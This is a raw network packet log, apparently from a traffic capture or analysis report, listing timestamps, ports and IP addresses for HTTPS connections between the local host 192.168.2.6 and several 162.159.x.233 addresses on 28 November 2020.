Nov 28, 2020 10:24:54.907704115 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907718897 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907726049 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907747984 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907759905 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907768965 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907789946 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907810926 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907814026 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907838106 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907856941 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907861948 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907883883 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907906055 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907908916 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907927990 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907937050 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.907957077 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907989979 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.907994032 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908020020 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908046961 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908056974 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908071041 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908092022 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908108950 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908113956 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908135891 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908152103 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908157110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908179998 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908200979 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908201933 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908226967 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908247948 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908252954 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908287048 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908292055 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908318996 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908345938 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908355951 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908368111 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908390045 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908402920 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908411026 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908437014 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908444881 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908458948 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908479929 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908495903 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908500910 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908523083 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908534050 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908543110 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908565044 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908571959 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908624887 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908632040 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908647060 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908668995 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908669949 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908691883 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908710003 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908719063 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908741951 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908754110 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908766985 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908799887 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908809900 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908827066 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908848047 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908865929 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908869028 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908891916 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908905983 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908921003 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908943892 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908965111 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.908977032 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.908987045 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909008026 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909008980 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909034014 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909044027 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909068108 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909100056 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909104109 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909131050 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909154892 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909166098 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909177065 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909198999 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909218073 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909220934 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909244061 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909262896 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909265995 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909286976 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909302950 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909312010 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909336090 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909346104 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909356117 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909378052 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909408092 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909415007 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909436941 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909460068 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909462929 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909495115 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909503937 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909528017 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909558058 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909567118 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909583092 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909604073 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909615040 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909626961 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909647942 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909670115 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909673929 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909698009 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909718990 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909719944 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909740925 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909756899 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909763098 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909782887 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909801960 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909804106 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909826994 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909847975 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909852028 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909878016 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909892082 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909913063 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909943104 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909946918 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.909966946 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.909987926 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910000086 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910008907 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910029888 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910046101 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910054922 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910078049 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910089016 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910099030 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910120964 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910137892 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910144091 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910176992 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910186052 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910208941 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910234928 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910245895 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910262108 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910286903 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910296917 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910307884 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910329103 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910350084 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910350084 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910382032 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910392046 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910414934 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910443068 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910451889 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910470009 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910492897 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910511971 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910512924 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910536051 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910552979 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910557032 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910578012 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910594940 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910598993 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910617113 CET	443	49728	162.159.129.233	192.168.2.6
Nov 28, 2020 10:24:54.910634995 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:24:54.910696030 CET	49728	443	192.168.2.6	162.159.129.233
Nov 28, 2020 10:25:10.855243921 CET	49733	443	192.168.2.6	162.159.128.233
Nov 28, 2020 10:25:10.871731043 CET	443	49733	162.159.128.233	192.168.2.6
Nov 28, 2020 10:25:10.871933937 CET	49733	443	192.168.2.6	162.159.128.233
Nov 28, 2020 10:25:10.872864008 CET	49733	443	192.168.2.6	162.159.128.233
Nov 28, 2020 10:25:10.889303923 CET	443	49733	162.159.128.233	192.168.2.6
Nov 28, 2020 10:25:10.889405966 CET	49733	443	192.168.2.6	162.159.128.233
Nov 28, 2020 10:25:10.984386921 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.000678062 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.000797987 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.006370068 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.022674084 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.023514986 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.023546934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.023576021 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.023617983 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.026065111 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.042381048 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.042444944 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.085419893 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.117928028 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.134289026 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157715082 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157738924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157761097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157782078 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157808065 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157814026 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.157833099 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157840967 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.157851934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157876015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157900095 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157901049 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.157924891 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157949924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.157984018 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158118963 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158632040 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158678055 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158704042 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158727884 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158741951 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158750057 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158751965 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158776045 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158793926 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158801079 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158826113 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158847094 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158854961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158881903 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158900976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158906937 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158925056 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158947945 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158951044 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158971071 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.158989906 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.158996105 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159019947 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159049034 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159056902 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159075022 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159097910 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159102917 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159121990 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159143925 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159146070 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159168959 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159193039 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159215927 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159218073 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159240961 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159250021 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159266949 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159291029 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159292936 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159307957 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159332037 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159336090 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159354925 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159368038 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159379959 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159404039 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159424067 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159430981 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159456015 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159478903 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159480095 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159503937 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159527063 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159528971 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159548998 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159571886 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159595013 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159615040 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159624100 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159656048 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159662008 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159681082 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.159687042 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159704924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.159756899 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.174252987 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.174276114 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.174319029 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.175894976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.175925016 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.175949097 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.175961971 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.175973892 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.175992966 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176002979 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176028013 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176053047 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176055908 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176080942 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176105976 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176105976 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176131010 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176156044 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176156044 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176179886 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176203012 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176204920 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176227093 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176254034 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176256895 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176282883 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176304102 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176306963 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176331997 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176353931 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176357985 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176383018 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176409006 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176409006 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176433086 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176455975 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176460981 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176487923 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176502943 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176512957 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176537991 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176561117 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176584005 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176587105 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176629066 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176636934 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176662922 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176686049 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176709890 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176732063 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176734924 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176765919 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176770926 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176776886 CET	49734	443	192.168.2.6	162.159.135.233
Nov 28, 2020 10:25:11.176793098 CET	443	49734	162.159.135.233	192.168.2.6
Nov 28, 2020 10:25:11.176815987 CET	443	49734	162.159.135.233	192.168.2.6
